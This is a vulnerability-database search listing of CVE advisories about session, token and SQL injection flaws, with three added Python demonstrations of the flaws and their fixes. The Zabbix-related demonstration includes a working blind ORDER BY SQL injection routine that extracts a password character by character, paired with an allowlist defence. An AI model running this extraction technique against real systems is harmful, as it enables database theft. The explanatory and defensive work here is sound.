Lucene search

40 matches found

ATTACKERKB
added 2026/03/30 12:00 a.m.

CVE-2026-29872

A cross-session information disclosure vulnerability exists in the awesome-llm-apps project as of commit e46690f99c3f08be80a9877fab52acacf7ab8251 (2026-01-19). The affected Streamlit-based GitHub MCP Agent stores user-supplied API tokens in process-wide environment variables using os.environ without...

CVSS 8.2 · AI score 5.9 · EPSS 0.00098
Exploits: 1 · References: 2

CVE
added 2026/03/30 12:00 a.m.

CVE-2026-29872

Technical details about CVE-2026-29872 are not publicly available in the provided connected documents. The initial description contains information but no further technical specifics. Monitor for updates.

CVSS 8.2 · AI score 5.9 · EPSS 0.00098
Exploits: 1 · References: 1 · Affected software: 1

Positive Technologies
added 2026/03/30 12:00 a.m.

PT-2026-29084

Name of the vulnerable software and affected versions: awesome-llm-apps versions prior to commit e46690f99c3f08be80a9877fab52acacf7ab8251
Description: A cross-session information disclosure issue exists in the awesome-llm-apps project. The Streamlit-based GitHub MCP Agent stores user-supplied API...

CVSS 8.2 · AI score 5.9 · EPSS 0.00098
Exploits: 1 · References: 5

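The three CVE-2026-29872 entries above describe the same mechanism: a per-user token written into os.environ, which is shared by every session served by that Python process. The following is an added example, not code from awesome-llm-apps or the GitHub MCP Agent, that reproduces the leak with two simulated sessions and shows the session-scoped alternative. Streamlit is not imported; a small per-session dict stands in for st.session_state, and the variable name GITHUB_TOKEN and the token values are assumptions for the demo.

```python
"""Added example: why a user-supplied token in os.environ is visible to other
sessions (and to child processes) of the same app, and how to keep it per-session.
Not the project's code; Streamlit is replaced by a tiny Session class."""
import os
import subprocess
import sys
from typing import Dict, Optional

TOKEN_VAR = "GITHUB_TOKEN"   # assumed variable name, not taken from the advisory


def vulnerable_set_token(token: str) -> None:
    """Pattern named in the advisory: the token lands in the process-wide
    environment, which every browser session of this process shares."""
    os.environ[TOKEN_VAR] = token


def vulnerable_get_token() -> Optional[str]:
    return os.environ.get(TOKEN_VAR)


class Session:
    """Stand-in for one Streamlit browser session and its st.session_state."""

    def __init__(self) -> None:
        self.state: Dict[str, str] = {}

    def set_token(self, token: str) -> None:
        self.state[TOKEN_VAR] = token        # scoped to this session only

    def get_token(self) -> Optional[str]:
        return self.state.get(TOKEN_VAR)


def demo_cross_session_leak():
    """Alice enters a token; Bob never does. Returns what Bob can read via the
    environment and via his own session state."""
    alice, bob = Session(), Session()
    vulnerable_set_token("ghp_alice_token")   # constructed token value
    alice.set_token("ghp_alice_token")
    return vulnerable_get_token(), bob.get_token()


def _child_reads_env() -> str:
    """Spawn a child (as an agent spawning an MCP server would) and report
    what it sees in its inherited environment."""
    code = f"import os; print(os.environ.get({TOKEN_VAR!r}, ''))"
    out = subprocess.run([sys.executable, "-c", code],
                         capture_output=True, text=True, check=True).stdout
    return out.strip()


def token_visible_to_child_process() -> bool:
    """os.environ is inherited by subprocesses, so the leak is not limited to
    other sessions in the same interpreter."""
    return _child_reads_env() != ""


def child_sees_token_via_explicit_env(session: Session) -> str:
    """Session-scoped fix: if a child must receive the token, pass it in that
    call's env mapping instead of mutating the parent's os.environ."""
    token = session.get_token() or ""
    code = f"import os; print(os.environ.get({TOKEN_VAR!r}, ''))"
    env = {**os.environ, TOKEN_VAR: token}
    out = subprocess.run([sys.executable, "-c", code], env=env,
                         capture_output=True, text=True, check=True).stdout
    return out.strip()


if __name__ == "__main__":
    s = Session()
    s.set_token("ghp_alice_token")
    print("child via explicit env:", child_sees_token_via_explicit_env(s))
    print("parent env still clean:", TOKEN_VAR not in os.environ)
    print("leak (env, bob's state):", demo_cross_session_leak())
    print("child inherits leaked token:", token_visible_to_child_process())
```

Run it stand-alone to see that the explicit-env path hands the token to one child without touching the parent environment, while the os.environ path exposes it to every later session and child.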
EUVD
added 2026/03/24 9:31 p.m.

EUVD-2026-14955

A low privilege Zabbix user with API access can exploit a blind SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL selects via the sortfield parameter. Although query results are not returned directly, an attacker can exfiltrate arbitrary database data...

CVSS 8.7 · AI score 6.1 · EPSS 0.00045
Exploits: 0 · References: 2

OSV
added 2026/03/24 7:16 p.m.

UBUNTU-CVE-2026-23921

A low privilege Zabbix user with API access can exploit a blind SQL injection vulnerability in include/classes/api/CApiService.php to execute arbitrary SQL selects via the sortfield parameter. Although query results are not returned directly, an attacker can exfiltrate arbitrary database data...

CVSS 8.7 · AI score 6.1 · EPSS 0.00045
Exploits: 0 · References: 3

Positive Technologies
added 2026/03/24 12:00 a.m.

PT-2026-27475

Name of the vulnerable software and affected versions: Zabbix versions prior to 7.4.6
Description: A Zabbix user with API access can exploit a blind SQL injection in the CApiService.php file. The issue resides in the sortfield parameter, allowing an attacker to execute arbitrary SQL selects. While...

CVSS 8.7 · AI score 6.1 · EPSS 0.00045
Exploits: 0 · References: 15

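The three Zabbix entries above all hinge on one point: a sort field that reaches ORDER BY unvalidated is a blind injection even when no row of the injected subquery is ever returned, because the attacker controls the order of the rows that are returned. The following is an added, generic illustration of that technique and of the allowlist check that closes it; it is not Zabbix's CApiService.php code, and the table and column names, the in-memory SQLite database and the secret value are constructed for the demo.

```python
"""Added example: boolean inference through a user-controlled ORDER BY expression,
and the allowlist that prevents it. Generic illustration, not Zabbix code."""
import sqlite3
from typing import List

ALLOWED_SORT_FIELDS = {"hostid", "name"}   # assumed sortable columns for the demo


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a table the API legitimately lists and a
    table it must never expose."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE hosts(hostid INTEGER, name TEXT);
        INSERT INTO hosts VALUES (1, 'alpha'), (2, 'bravo');
        CREATE TABLE users(userid INTEGER, username TEXT, passwd TEXT);
        INSERT INTO users VALUES (1, 'Admin', 's3cr3t');   -- constructed secret
    """)
    return con


def vulnerable_query(con: sqlite3.Connection, sortfield: str) -> List[str]:
    """Interpolates the caller-supplied field name into ORDER BY. Only host
    names are returned; the users table never appears in the result set."""
    sql = f"SELECT name FROM hosts ORDER BY {sortfield}"
    return [row[0] for row in con.execute(sql)]


def safe_query(con: sqlite3.Connection, sortfield: str) -> List[str]:
    """Same query, but the field must be one of a fixed set of column names.
    Identifiers cannot be bound as parameters, so an allowlist is the fix."""
    if sortfield not in ALLOWED_SORT_FIELDS:
        raise ValueError(f"invalid sort field: {sortfield!r}")
    sql = f"SELECT name FROM hosts ORDER BY {sortfield}"
    return [row[0] for row in con.execute(sql)]


def safe_query_rejects(con: sqlite3.Connection, sortfield: str) -> bool:
    try:
        safe_query(con, sortfield)
    except ValueError:
        return True
    return False


def oracle(con: sqlite3.Connection, condition: str) -> bool:
    """One bit per query: sort ascending by hostid when the condition holds
    ('alpha' first), descending otherwise ('bravo' first)."""
    payload = f"(CASE WHEN ({condition}) THEN hostid ELSE -hostid END)"
    return vulnerable_query(con, payload)[0] == "alpha"


def exfiltrate_admin_password(con: sqlite3.Connection, max_len: int = 32) -> str:
    """Recover users.passwd for 'Admin' one printable character at a time.
    Past the end of the string substr() yields '' and unicode('') is NULL,
    so no code matches and the loop stops."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):
            cond = ("unicode(substr((SELECT passwd FROM users "
                    f"WHERE username = 'Admin'), {pos}, 1)) = {code}")
            if oracle(con, cond):
                found = chr(code)
                break
        if found is None:
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("legit sort:", safe_query(db, "name"))
    print("recovered via ORDER BY oracle:", exfiltrate_admin_password(db))
    print("allowlist blocks payload:",
          safe_query_rejects(db, "(CASE WHEN (1=1) THEN hostid ELSE -hostid END)"))
```

The oracle needs only two distinguishable rows and an expression the database will accept in ORDER BY; the same idea works with a CASE that selects between columns of different types, or with a conditional delay, on other engines. A numeric index into the allowlist is an equally good fix where the API exposes sort positions rather than names.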
Cvelist
added 2026/03/20 5:52 a.m.

CVE-2026-33043 AVideo affected by Session Hijacking via Unauthenticated Session ID Disclosure with Permissive CORS

WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials...

CVSS 8.1 · EPSS 0.0002
Exploits: 1 · References: 2

ATTACKERKB
added 2026/02/12 10:26 a.m.

CVE-2026-2276

Reflected cross-site scripting (XSS) vulnerability in the Wix web application, where the endpoint https://manage.wix.com/account/account-settings, responsible for uploading SVG images, does not properly sanitize the content. An authenticated attacker could upload an SVG file containing embedded...

CVSS 5.3 · AI score 5.8 · EPSS 0.00023
Exploits: 0 · References: 2

CNNVD
added 2025/12/09 12:00 a.m.

Mercury MR816v2 security vulnerability

The Mercury MR816v2 is an access control device from Mercury China. A security vulnerability exists in Mercury MR816v2 081C3114 version 4.8.7 Build 110427 Rel 36550n, which originates from stored cross-site scripting and could lead to the disclosure of an administrator's session and the execution...

CVSS 6.1 · AI score 5.9 · EPSS 0.00046
Exploits: 1 · References: 2

EUVD
added 2025/11/19 3:31 p.m.

EUVD-2025-198158

A reflected cross-site scripting (XSS) vulnerability exists in the password change functionality of Pixeon WebLaudos 25.1 01, via the slesSenha parameter of the loginAlterarSenha.asp file. An attacker can craft a malicious URL that, when visited by a victim, causes arbitrary JavaScript code to be...

CVSS 4.6 · AI score 5.4 · EPSS 0.00026
Exploits: 1 · References: 3

Tenable Nessus
added 2025/08/30 12:00 a.m.

Linux Distros Unpatched Vulnerability : CVE-2019-12746

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor-supplied patch available. - An issue was discovered in Open Ticket Request System (OTRS) Community Edition 5.0.x through 5.0.36 and 6.0.x through 6.0.19. A user logged into OTRS as an agent...

CVSS 6.5 · AI score 5.6 · EPSS 0.00838
Exploits: 0 · References: 2

CNNVD
added 2025/08/27 12:00 a.m.

CGM CLININET security vulnerability

CGM CLININET is a hospital information management system from CGM Germany. A security vulnerability exists in CGM CLININET that originates from a session ID disclosure via an NTFS alternate data stream...

CVSS 7.3 · AI score 6.1 · EPSS 0.00031
Exploits: 0 · References: 2

CNVD
added 2025/07/04 12:00 a.m.

FileBrowser has an unspecified vulnerability (CNVD-2025-22704)

FileBrowser is an open source web file browser. It provides a file management interface within a specified directory and can be used to upload, delete, preview, rename and edit files. FileBrowser has a security vulnerability that originates from an access token passed as a GET parameter, which c...

CVSS 6.5 · AI score 7.3 · EPSS 0.00348
Exploits: 1 · References: 1

CNNVD
added 2025/06/30 12:00 a.m.

FileBrowser security vulnerability

FileBrowser is an open source web file browser. It provides a file management interface within a specified directory and can be used to upload, delete, preview, rename and edit files. FileBrowser has a security vulnerability that originates from an access token passed as a GET parameter, which c...

CVSS 6.5 · AI score 7.1 · EPSS 0.00348
Exploits: 1 · References: 4

CNNVD
added 2024/07/05 12:00 a.m.

Ispmanager security vulnerability

Ispmanager is a Linux-based control panel from Ispmanager, Inc. It is used to manage dedicated, gaming and VPS web servers, as well as to sell shared hosting. A security vulnerability exists in Ispmanager version 6.98.0, which stems from an information disclosure issue that allows an attacker to...

CVSS 7.5 · AI score 6.5 · EPSS 0.00171
Exploits: 0 · References: 2

Cvelist
added 2024/06/14 4:09 a.m.

CVE-2024-27179 Session disclosure inside the log files

Admin cookies are written in clear text in logs. An attacker can retrieve them and bypass the authentication mechanism. As for the affected products/models/versions, see the reference URL...

CVSS 4.7 · EPSS 0.0003
Exploits: 1 · References: 4

Vulnrichment
added 2024/06/14 4:09 a.m.

CVE-2024-27179 Session disclosure inside the log files

Admin cookies are written in clear text in logs. An attacker can retrieve them and bypass the authentication mechanism. As for the affected products/models/versions, see the reference URL...

CVSS 4.7 · AI score 7.3 · EPSS 0.0003
Exploits: 1 · References: 4

Veracode
added 2024/02/28 9:45 a.m.

Session Token Disclosure

activestorage is vulnerable to sensitive information disclosure. The vulnerability is due to the Set-Cookie header being cached when serving blobs if Rails is behind a proxy. Certain proxies may cache the Set-Cookie header, which can result in a user's session being disclosed to another user...

CVSS 5.3 · AI score 6.5 · EPSS 0.02363
Exploits: 0 · References: 6 · Affected software: 1

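The activestorage entry above is a caching problem rather than an application logic bug: a blob response carries a Set-Cookie header, a shared cache in front of the app stores the whole response, and the next user requesting the same URL receives the first user's cookie. The following is an added example, not Rails or activestorage code, that models a naive shared cache and shows the header change that stops it from storing the cookie-bearing response; the URL, session IDs and the cache's storage rule are constructed for the demo.

```python
"""Added example: a shared cache that stores Set-Cookie hands one user's
session to the next; marking the response private/no-store prevents it.
Not Rails/activestorage code; the cache is a simplified model."""
from typing import Callable, Dict, Optional

Response = Dict[str, str]     # header name -> value; body omitted


class SharedCache:
    """Caches responses by URL, as a naive reverse proxy might. It honours
    only Cache-Control private/no-store, which is all this demo needs."""

    def __init__(self) -> None:
        self._store: Dict[str, Response] = {}

    def fetch(self, url: str, origin: Callable[[str], Response], session_id: str) -> Response:
        if url in self._store:
            return dict(self._store[url])        # served from cache, cookie and all
        resp = origin(session_id)
        if self._is_cacheable(resp):
            self._store[url] = dict(resp)
        return resp

    @staticmethod
    def _is_cacheable(resp: Response) -> bool:
        directives = {d.strip().lower() for d in resp.get("Cache-Control", "").split(",")}
        return not ({"private", "no-store"} & directives)


def blob_response_vulnerable(session_id: str) -> Response:
    """Blob served with a public max-age and a freshly set session cookie:
    a shared cache is allowed to store it."""
    return {"Content-Type": "image/png",
            "Cache-Control": "public, max-age=3600",
            "Set-Cookie": f"_session_id={session_id}; Path=/; HttpOnly"}


def blob_response_fixed(session_id: str) -> Response:
    """Same blob; any response that sets a cookie is marked so that shared
    caches will not store it (per-user content must never be shared)."""
    resp = blob_response_vulnerable(session_id)
    if "Set-Cookie" in resp:
        resp["Cache-Control"] = "private, no-store"
    return resp


def cookie_second_user_receives(handler: Callable[[str], Response]) -> Optional[str]:
    """Alice fetches the blob first, then Bob fetches the same URL through the
    same cache. Returns the Set-Cookie value Bob ends up with."""
    cache = SharedCache()
    url = "/rails/active_storage/blobs/abc123/avatar.png"    # constructed path
    cache.fetch(url, handler, session_id="alice-session")
    bob = cache.fetch(url, handler, session_id="bob-session")
    return bob.get("Set-Cookie")


if __name__ == "__main__":
    print("vulnerable, Bob receives:", cookie_second_user_receives(blob_response_vulnerable))
    print("fixed, Bob receives:     ", cookie_second_user_receives(blob_response_fixed))
```

The better fix in a real app is to not set a session cookie on static blob responses at all; the header change here is the defence that holds even when some controller does. When auditing a deployment, fetch a blob twice from two different client sessions through the proxy and compare the Set-Cookie values, which is what the second function above does in miniature.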
CNNVD
added 2024/02/02 12:00 a.m.

Central Dogma security vulnerability

Central Dogma is an open source service configuration version control repository based on Git, ZooKeeper and HTTP/2. A security vulnerability exists in versions of Central Dogma prior to 0.64.0 that stems from a cross-site scripting (XSS) vulnerability, which could lead to user session...

CVSS 9.3 · AI score 5.8 · EPSS 0.00281
Exploits: 0 · References: 4

Positive Technologies
added 2024/01/26 12:00 a.m.

PT-2024-1394 · Totolink · Totolink N350Rt

Name of the vulnerable software and affected versions: Totolink N350RT version 9.3.5u.6255
Description: The issue is related to the /cgi-bin/cstecgi.cgi file in the Totolink N350RT router's firmware, which is associated with incorrect session expiration. This can be exploited by a remote attacker...

CVSS 5.3 · AI score 4.5 · EPSS 0.00078
Exploits: 0 · References: 11